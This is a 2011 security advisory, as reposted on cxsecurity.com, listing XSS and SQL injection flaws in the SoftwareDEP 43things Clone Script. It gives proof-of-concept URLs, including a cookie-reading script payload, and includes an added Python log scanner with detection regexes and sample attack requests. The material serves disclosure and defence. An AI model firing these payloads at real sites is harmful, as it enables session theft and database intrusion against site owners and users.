SoftwareDEP 43things Clone Script Multiple Vulnerabilities

Published: 2011.08.19
Credit: v3n0m
Risk: Low
CWE: N/A
CVE: N/A
Local: No
Remote: Yes

-----------------------------------------------------------------------
SoftwareDEP 43things Clone Script Multiple Vulnerabilities

Author : v3n0m
Discovered : August 18, 2011 (GMT+7:00, Jakarta, Indonesia)
Software : 43things Clone script
Developer : http://www.softwaredep.com/
Price : $700
Version : v2 (lower versions may also be affected)
-----------------------------------------------------------------------

PoC:
---

XSS Injection:
-------------
http://www.domain.tld/[path]/zeitgeist/tag_list.php?tag=<script>alert(document.cookie)</script>

SQL Injection:
-------------
http://www.domain.tld/[path]/thing_detail.php?thingid=[SQLi]
http://www.domain.tld/[path]/thingshome.php?uid=[SQLi]
http://www.domain.tld/[path]/recent_activity.php?uid=[SQLi]
http://www.domain.tld/[path]/year_in_review.php?uid=[SQLi]
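Detection logic for the two issue classes listed above, as an added example that is not part of the advisory or the vendor's code: it scans combined-format web server log lines (constructed samples embedded inline) for requests to the five named scripts whose listed parameter carries script markup (tag) or a quoted/non-numeric value (thingid, uid). The assumption that thingid and uid are integer ids is mine, not the vendor's.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote_plus

# Endpoint -> parameter names taken from the advisory's PoC URLs.
# The [path] prefix is unknown, so matching is on the script file name only.
WATCHED = {
    "tag_list.php": {"tag"},
    "thing_detail.php": {"thingid"},
    "thingshome.php": {"uid"},
    "recent_activity.php": {"uid"},
    "year_in_review.php": {"uid"},
}

# Combined log format: client ident user [time] "METHOD target proto" status size
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')

XSS_RE = re.compile(r'<\s*/?\s*script\b|javascript:|\bon\w+\s*=', re.I)
SQLI_RE = re.compile(r"['\"]|--|/\*|#|\bunion\b", re.I)  # quote/comment/union markers in an id


def classify(target):
    """Return (script, param, kind) when the request hits a watched endpoint with a
    suspicious value for one of its listed parameters, otherwise None."""
    parts = urlsplit(target)
    script = parts.path.rsplit("/", 1)[-1]
    if script not in WATCHED:
        return None
    for name, values in parse_qs(parts.query, keep_blank_values=True).items():
        if name not in WATCHED[script]:
            continue
        for value in values:
            value = unquote_plus(value)  # second decode catches double-encoded payloads
            if name == "tag":
                if XSS_RE.search(value):
                    return (script, name, "xss")
            # thingid/uid are assumed to be numeric ids: anything else is suspicious
            elif SQLI_RE.search(value) or not value.isdigit():
                return (script, name, "sqli")
    return None


def scan(lines):
    """Return a list of (client_ip, script, param, kind) for every matching log line."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if m and (hit := classify(m["target"])):
            hits.append((m["ip"], *hit))
    return hits


# Constructed sample log lines (not real traffic); the first two mirror the advisory's PoCs.
SAMPLE_LOG = [
    '203.0.113.7 - - [19/Aug/2011:10:01:02 +0700] "GET /app/zeitgeist/tag_list.php?tag=%3Cscript%3Ealert(document.cookie)%3C/script%3E HTTP/1.1" 200 512',
    '203.0.113.7 - - [19/Aug/2011:10:01:09 +0700] "GET /app/thing_detail.php?thingid=42%27 HTTP/1.1" 500 0',
    '198.51.100.3 - - [19/Aug/2011:10:02:00 +0700] "GET /app/thingshome.php?uid=17 HTTP/1.1" 200 2048',
    '198.51.100.3 - - [19/Aug/2011:10:02:05 +0700] "GET /app/year_in_review.php?uid=17%27+-- HTTP/1.1" 200 2048',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print("ALERT", *hit)
```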

Credits:
-------
www.yogyacarderlink.web.id - irc.yogyacarderlink.web.id


Copyright 2017, cxsecurity.com